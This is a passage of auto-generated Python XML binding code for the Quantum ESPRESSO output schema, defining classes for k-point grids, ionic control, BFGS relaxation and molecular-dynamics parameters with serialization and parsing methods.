            return k_points_IBZType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessors/mutators for the child elements.
    def get_monkhorst_pack(self): return self.monkhorst_pack
    def set_monkhorst_pack(self, monkhorst_pack): self.monkhorst_pack = monkhorst_pack
    def get_nk(self): return self.nk
    def set_nk(self, nk): self.nk = nk
    def get_k_point(self): return self.k_point
    def set_k_point(self, k_point): self.k_point = k_point
    def add_k_point(self, value): self.k_point.append(value)
    def insert_k_point_at(self, index, value): self.k_point.insert(index, value)
    def replace_k_point_at(self, index, value): self.k_point[index] = value
    def hasContent_(self):
        """Return True when any child element is present (controls whether
        export emits a self-closing tag)."""
        if (
            self.monkhorst_pack is not None or
            self.nk is not None or
            self.k_point
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='k_points_IBZType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element (and its children) as XML to *outfile* at
        indentation *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('k_points_IBZType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Re-use the tag name this object was parsed from, if any.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='k_points_IBZType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='k_points_IBZType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='k_points_IBZType'):
        """No XML attributes are defined for this type."""
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='k_points_IBZType', fromsubclass_=False, pretty_print=True):
        """Serialize the child elements in schema order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.monkhorst_pack is not None:
            self.monkhorst_pack.export(outfile, level, namespaceprefix_, name_='monkhorst_pack', pretty_print=pretty_print)
        if self.nk is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:nk>%s</qes:nk>%s' % (self.gds_format_integer(self.nk, input_name='nk'), eol_))
        for k_point_ in self.k_point:
            k_point_.export(outfile, level, namespaceprefix_, name_='k_point', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """No XML attributes are defined for this type."""
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element of *node* and store it on self."""
        if nodeName_ == 'monkhorst_pack':
            obj_ = monkhorst_packType.factory()
            obj_.build(child_)
            self.monkhorst_pack = obj_
            obj_.original_tagname_ = 'monkhorst_pack'
        elif nodeName_ == 'nk' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            # Schema constrains nk to xs:positiveInteger.
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'nk')
            self.nk = ival_
        elif nodeName_ == 'k_point':
            obj_ = k_pointType.factory()
            obj_.build(child_)
            self.k_point.append(obj_)
            obj_.original_tagname_ = 'k_point'
# end class k_points_IBZType
class monkhorst_packType(GeneratedsSuper):
    """Generated binding for the XSD complex type ``monkhorst_packType``.

    A Monkhorst-Pack k-point grid.  The grid sizes ``nk1``/``nk2``/``nk3``
    (positive integers) and shifts ``k1``/``k2``/``k3`` (non-negative
    integers) are XML attributes; any element text is kept in ``valueOf_``.
    Auto-generated by generateDS.py.
    """
    subclass = None
    superclass = None
    def __init__(self, nk1=None, nk2=None, nk3=None, k1=None, k2=None, k3=None, valueOf_=None):
        self.original_tagname_ = None
        # _cast coerces non-None constructor arguments to int.
        self.nk1 = _cast(int, nk1)
        self.nk2 = _cast(int, nk2)
        self.nk3 = _cast(int, nk3)
        self.k1 = _cast(int, k1)
        self.k2 = _cast(int, k2)
        self.k3 = _cast(int, k3)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        """Instantiate this class, honoring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, monkhorst_packType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if monkhorst_packType.subclass:
            return monkhorst_packType.subclass(*args_, **kwargs_)
        else:
            return monkhorst_packType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessors/mutators for the attributes and text content.
    def get_nk1(self): return self.nk1
    def set_nk1(self, nk1): self.nk1 = nk1
    def get_nk2(self): return self.nk2
    def set_nk2(self, nk2): self.nk2 = nk2
    def get_nk3(self): return self.nk3
    def set_nk3(self, nk3): self.nk3 = nk3
    def get_k1(self): return self.k1
    def set_k1(self, k1): self.k1 = k1
    def get_k2(self): return self.k2
    def set_k2(self, k2): self.k2 = k2
    def get_k3(self): return self.k3
    def set_k3(self, k3): self.k3 = k3
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        """Return True when the element has text content.  Numeric 0/0.0 is
        treated as content (the int/float special case below)."""
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_)
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='monkhorst_packType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element (attributes plus text content) as XML."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('monkhorst_packType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Re-use the tag name this object was parsed from, if any.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='monkhorst_packType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='monkhorst_packType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='monkhorst_packType'):
        """Emit each non-None attribute exactly once (tracked via
        *already_processed*)."""
        if self.nk1 is not None and 'nk1' not in already_processed:
            already_processed.add('nk1')
            outfile.write(' nk1="%s"' % self.gds_format_integer(self.nk1, input_name='nk1'))
        if self.nk2 is not None and 'nk2' not in already_processed:
            already_processed.add('nk2')
            outfile.write(' nk2="%s"' % self.gds_format_integer(self.nk2, input_name='nk2'))
        if self.nk3 is not None and 'nk3' not in already_processed:
            already_processed.add('nk3')
            outfile.write(' nk3="%s"' % self.gds_format_integer(self.nk3, input_name='nk3'))
        if self.k1 is not None and 'k1' not in already_processed:
            already_processed.add('k1')
            outfile.write(' k1="%s"' % self.gds_format_integer(self.k1, input_name='k1'))
        if self.k2 is not None and 'k2' not in already_processed:
            already_processed.add('k2')
            outfile.write(' k2="%s"' % self.gds_format_integer(self.k2, input_name='k2'))
        if self.k3 is not None and 'k3' not in already_processed:
            already_processed.add('k3')
            outfile.write(' k3="%s"' % self.gds_format_integer(self.k3, input_name='k3'))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='monkhorst_packType', fromsubclass_=False, pretty_print=True):
        """This type has no child elements, only attributes and text."""
        pass
    def build(self, node):
        """Populate this object from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse and validate the six grid attributes: nk1/nk2/nk3 must be
        positive, k1/k2/k3 non-negative."""
        value = find_attr_value_('nk1', node)
        if value is not None and 'nk1' not in already_processed:
            already_processed.add('nk1')
            try:
                self.nk1 = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.nk1 <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
        value = find_attr_value_('nk2', node)
        if value is not None and 'nk2' not in already_processed:
            already_processed.add('nk2')
            try:
                self.nk2 = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.nk2 <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
        value = find_attr_value_('nk3', node)
        if value is not None and 'nk3' not in already_processed:
            already_processed.add('nk3')
            try:
                self.nk3 = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.nk3 <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
        value = find_attr_value_('k1', node)
        if value is not None and 'k1' not in already_processed:
            already_processed.add('k1')
            try:
                self.k1 = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.k1 < 0:
                raise_parse_error(node, 'Invalid NonNegativeInteger')
        value = find_attr_value_('k2', node)
        if value is not None and 'k2' not in already_processed:
            already_processed.add('k2')
            try:
                self.k2 = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.k2 < 0:
                raise_parse_error(node, 'Invalid NonNegativeInteger')
        value = find_attr_value_('k3', node)
        if value is not None and 'k3' not in already_processed:
            already_processed.add('k3')
            try:
                self.k3 = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.k3 < 0:
                raise_parse_error(node, 'Invalid NonNegativeInteger')
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """This type has no child elements to parse."""
        pass
# end class monkhorst_packType
class k_pointType(GeneratedsSuper):
    """Generated binding for the XSD complex type ``k_pointType``.

    A single k-point: the coordinates live in the element text
    (``valueOf_``), with an optional ``weight`` (double) and ``label``
    (string) as XML attributes.  Auto-generated by generateDS.py.
    """
    subclass = None
    superclass = None
    def __init__(self, weight=None, label=None, valueOf_=None):
        self.original_tagname_ = None
        # _cast coerces non-None constructor arguments; label is stored as-is.
        self.weight = _cast(float, weight)
        self.label = _cast(None, label)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        """Instantiate this class, honoring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, k_pointType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if k_pointType.subclass:
            return k_pointType.subclass(*args_, **kwargs_)
        else:
            return k_pointType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessors/mutators for the attributes and text content.
    def get_weight(self): return self.weight
    def set_weight(self, weight): self.weight = weight
    def get_label(self): return self.label
    def set_label(self, label): self.label = label
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        """Return True when the element has text content.  Numeric 0/0.0 is
        treated as content (the int/float special case below)."""
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_)
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='k_pointType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element (attributes plus text content) as XML."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('k_pointType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Re-use the tag name this object was parsed from, if any.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='k_pointType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='k_pointType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='k_pointType'):
        """Emit the optional weight and label attributes."""
        if self.weight is not None and 'weight' not in already_processed:
            already_processed.add('weight')
            outfile.write(' weight="%s"' % self.gds_format_double(self.weight, input_name='weight'))
        if self.label is not None and 'label' not in already_processed:
            already_processed.add('label')
            # quote_attrib supplies the surrounding quotes for label.
            outfile.write(' label=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.label), input_name='label')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='k_pointType', fromsubclass_=False, pretty_print=True):
        """This type has no child elements, only attributes and text."""
        pass
    def build(self, node):
        """Populate this object from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse the weight and label attributes.

        NOTE(review): a malformed weight raises plain ValueError here rather
        than going through raise_parse_error as the sibling classes do —
        kept as generated to preserve the exception type callers may catch.
        """
        value = find_attr_value_('weight', node)
        if value is not None and 'weight' not in already_processed:
            already_processed.add('weight')
            try:
                self.weight = float(value)
            except ValueError as exp:
                raise ValueError('Bad float/double attribute (weight): %s' % exp)
        value = find_attr_value_('label', node)
        if value is not None and 'label' not in already_processed:
            already_processed.add('label')
            self.label = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """This type has no child elements to parse."""
        pass
# end class k_pointType
class ion_controlType(GeneratedsSuper):
    """Generated binding for the XSD complex type ``ion_controlType``.

    Ionic-relaxation/dynamics control block: the ``ion_dynamics`` scheme
    name, scalar options (``upscale``, ``remove_rigid_rot``,
    ``refold_pos``), and the nested ``bfgs``/``md`` parameter blocks.
    Auto-generated by generateDS.py.
    """
    subclass = None
    superclass = None
    def __init__(self, ion_dynamics=None, upscale=None, remove_rigid_rot=None, refold_pos=None, bfgs=None, md=None):
        self.original_tagname_ = None
        self.ion_dynamics = ion_dynamics
        self.upscale = upscale
        self.remove_rigid_rot = remove_rigid_rot
        self.refold_pos = refold_pos
        self.bfgs = bfgs
        self.md = md
    def factory(*args_, **kwargs_):
        """Instantiate this class, honoring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, ion_controlType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if ion_controlType.subclass:
            return ion_controlType.subclass(*args_, **kwargs_)
        else:
            return ion_controlType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessors/mutators for the child elements.
    def get_ion_dynamics(self): return self.ion_dynamics
    def set_ion_dynamics(self, ion_dynamics): self.ion_dynamics = ion_dynamics
    def get_upscale(self): return self.upscale
    def set_upscale(self, upscale): self.upscale = upscale
    def get_remove_rigid_rot(self): return self.remove_rigid_rot
    def set_remove_rigid_rot(self, remove_rigid_rot): self.remove_rigid_rot = remove_rigid_rot
    def get_refold_pos(self): return self.refold_pos
    def set_refold_pos(self, refold_pos): self.refold_pos = refold_pos
    def get_bfgs(self): return self.bfgs
    def set_bfgs(self, bfgs): self.bfgs = bfgs
    def get_md(self): return self.md
    def set_md(self, md): self.md = md
    def hasContent_(self):
        """Return True when any child element is present (controls whether
        export emits a self-closing tag)."""
        if (
            self.ion_dynamics is not None or
            self.upscale is not None or
            self.remove_rigid_rot is not None or
            self.refold_pos is not None or
            self.bfgs is not None or
            self.md is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='ion_controlType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element (and its children) as XML to *outfile* at
        indentation *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('ion_controlType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Re-use the tag name this object was parsed from, if any.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ion_controlType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='ion_controlType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='ion_controlType'):
        """No XML attributes are defined for this type."""
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='ion_controlType', fromsubclass_=False, pretty_print=True):
        """Serialize the child elements in schema order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.ion_dynamics is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:ion_dynamics>%s</qes:ion_dynamics>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.ion_dynamics), input_name='ion_dynamics')), eol_))
        if self.upscale is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:upscale>%s</qes:upscale>%s' % (self.gds_format_double(self.upscale, input_name='upscale'), eol_))
        if self.remove_rigid_rot is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:remove_rigid_rot>%s</qes:remove_rigid_rot>%s' % (self.gds_format_boolean(self.remove_rigid_rot, input_name='remove_rigid_rot'), eol_))
        if self.refold_pos is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:refold_pos>%s</qes:refold_pos>%s' % (self.gds_format_boolean(self.refold_pos, input_name='refold_pos'), eol_))
        if self.bfgs is not None:
            self.bfgs.export(outfile, level, namespaceprefix_, name_='bfgs', pretty_print=pretty_print)
        if self.md is not None:
            self.md.export(outfile, level, namespaceprefix_, name_='md', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """No XML attributes are defined for this type."""
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element of *node* and store it on self."""
        if nodeName_ == 'ion_dynamics':
            ion_dynamics_ = child_.text
            ion_dynamics_ = self.gds_validate_string(ion_dynamics_, node, 'ion_dynamics')
            self.ion_dynamics = ion_dynamics_
        elif nodeName_ == 'upscale' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'upscale')
            self.upscale = fval_
        elif nodeName_ == 'remove_rigid_rot':
            sval_ = child_.text
            # Only the literal xs:boolean forms 'true'/'1'/'false'/'0' are accepted.
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'remove_rigid_rot')
            self.remove_rigid_rot = ival_
        elif nodeName_ == 'refold_pos':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'refold_pos')
            self.refold_pos = ival_
        elif nodeName_ == 'bfgs':
            obj_ = bfgsType.factory()
            obj_.build(child_)
            self.bfgs = obj_
            obj_.original_tagname_ = 'bfgs'
        elif nodeName_ == 'md':
            obj_ = mdType.factory()
            obj_.build(child_)
            self.md = obj_
            obj_.original_tagname_ = 'md'
# end class ion_controlType
class bfgsType(GeneratedsSuper):
    """Generated binding for the XSD complex type ``bfgsType``.

    BFGS structural-relaxation parameters: history depth ``ndim``
    (positive integer), the trust-radius bounds/initial value, and the
    ``w1``/``w2`` weights (doubles).  Auto-generated by generateDS.py.
    """
    subclass = None
    superclass = None
    def __init__(self, ndim=None, trust_radius_min=None, trust_radius_max=None, trust_radius_init=None, w1=None, w2=None):
        self.original_tagname_ = None
        self.ndim = ndim
        self.trust_radius_min = trust_radius_min
        self.trust_radius_max = trust_radius_max
        self.trust_radius_init = trust_radius_init
        self.w1 = w1
        self.w2 = w2
    def factory(*args_, **kwargs_):
        """Instantiate this class, honoring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, bfgsType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if bfgsType.subclass:
            return bfgsType.subclass(*args_, **kwargs_)
        else:
            return bfgsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessors/mutators for the child elements.
    def get_ndim(self): return self.ndim
    def set_ndim(self, ndim): self.ndim = ndim
    def get_trust_radius_min(self): return self.trust_radius_min
    def set_trust_radius_min(self, trust_radius_min): self.trust_radius_min = trust_radius_min
    def get_trust_radius_max(self): return self.trust_radius_max
    def set_trust_radius_max(self, trust_radius_max): self.trust_radius_max = trust_radius_max
    def get_trust_radius_init(self): return self.trust_radius_init
    def set_trust_radius_init(self, trust_radius_init): self.trust_radius_init = trust_radius_init
    def get_w1(self): return self.w1
    def set_w1(self, w1): self.w1 = w1
    def get_w2(self): return self.w2
    def set_w2(self, w2): self.w2 = w2
    def hasContent_(self):
        """Return True when any child element is present (controls whether
        export emits a self-closing tag)."""
        if (
            self.ndim is not None or
            self.trust_radius_min is not None or
            self.trust_radius_max is not None or
            self.trust_radius_init is not None or
            self.w1 is not None or
            self.w2 is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='bfgsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element (and its children) as XML to *outfile* at
        indentation *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('bfgsType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Re-use the tag name this object was parsed from, if any.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='bfgsType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='bfgsType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='bfgsType'):
        """No XML attributes are defined for this type."""
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='bfgsType', fromsubclass_=False, pretty_print=True):
        """Serialize the child elements in schema order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.ndim is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:ndim>%s</qes:ndim>%s' % (self.gds_format_integer(self.ndim, input_name='ndim'), eol_))
        if self.trust_radius_min is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:trust_radius_min>%s</qes:trust_radius_min>%s' % (self.gds_format_double(self.trust_radius_min, input_name='trust_radius_min'), eol_))
        if self.trust_radius_max is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:trust_radius_max>%s</qes:trust_radius_max>%s' % (self.gds_format_double(self.trust_radius_max, input_name='trust_radius_max'), eol_))
        if self.trust_radius_init is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:trust_radius_init>%s</qes:trust_radius_init>%s' % (self.gds_format_double(self.trust_radius_init, input_name='trust_radius_init'), eol_))
        if self.w1 is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:w1>%s</qes:w1>%s' % (self.gds_format_double(self.w1, input_name='w1'), eol_))
        if self.w2 is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:w2>%s</qes:w2>%s' % (self.gds_format_double(self.w2, input_name='w2'), eol_))
    def build(self, node):
        """Populate this object from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """No XML attributes are defined for this type."""
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element of *node* and store it on self."""
        if nodeName_ == 'ndim' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            # Schema constrains ndim to xs:positiveInteger.
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'ndim')
            self.ndim = ival_
        elif nodeName_ == 'trust_radius_min' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'trust_radius_min')
            self.trust_radius_min = fval_
        elif nodeName_ == 'trust_radius_max' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'trust_radius_max')
            self.trust_radius_max = fval_
        elif nodeName_ == 'trust_radius_init' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'trust_radius_init')
            self.trust_radius_init = fval_
        elif nodeName_ == 'w1' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'w1')
            self.w1 = fval_
        elif nodeName_ == 'w2' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'w2')
            self.w2 = fval_
# end class bfgsType
class mdType(GeneratedsSuper):
    """Generated binding for the XSD complex type ``mdType``.

    Molecular-dynamics parameters: extrapolation scheme names, thermostat
    choice (``ion_temperature``), ``timestep`` (double, schema default
    20.0), temperatures/tolerances, and the ``nraise`` interval (positive
    integer).  Auto-generated by generateDS.py.
    """
    subclass = None
    superclass = None
    def __init__(self, pot_extrapolation=None, wfc_extrapolation=None, ion_temperature=None, timestep=20.0, tempw=None, tolp=None, deltaT=None, nraise=None):
        self.original_tagname_ = None
        self.pot_extrapolation = pot_extrapolation
        self.wfc_extrapolation = wfc_extrapolation
        self.ion_temperature = ion_temperature
        # timestep carries the schema default of 20.0 rather than None.
        self.timestep = timestep
        self.tempw = tempw
        self.tolp = tolp
        self.deltaT = deltaT
        self.nraise = nraise
    def factory(*args_, **kwargs_):
        """Instantiate this class, honoring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, mdType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if mdType.subclass:
            return mdType.subclass(*args_, **kwargs_)
        else:
            return mdType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessors/mutators for the child elements.
    def get_pot_extrapolation(self): return self.pot_extrapolation
    def set_pot_extrapolation(self, pot_extrapolation): self.pot_extrapolation = pot_extrapolation
    def get_wfc_extrapolation(self): return self.wfc_extrapolation
    def set_wfc_extrapolation(self, wfc_extrapolation): self.wfc_extrapolation = wfc_extrapolation
    def get_ion_temperature(self): return self.ion_temperature
    def set_ion_temperature(self, ion_temperature): self.ion_temperature = ion_temperature
    def get_timestep(self): return self.timestep
    def set_timestep(self, timestep): self.timestep = timestep
    def get_tempw(self): return self.tempw
    def set_tempw(self, tempw): self.tempw = tempw
    def get_tolp(self): return self.tolp
    def set_tolp(self, tolp): self.tolp = tolp
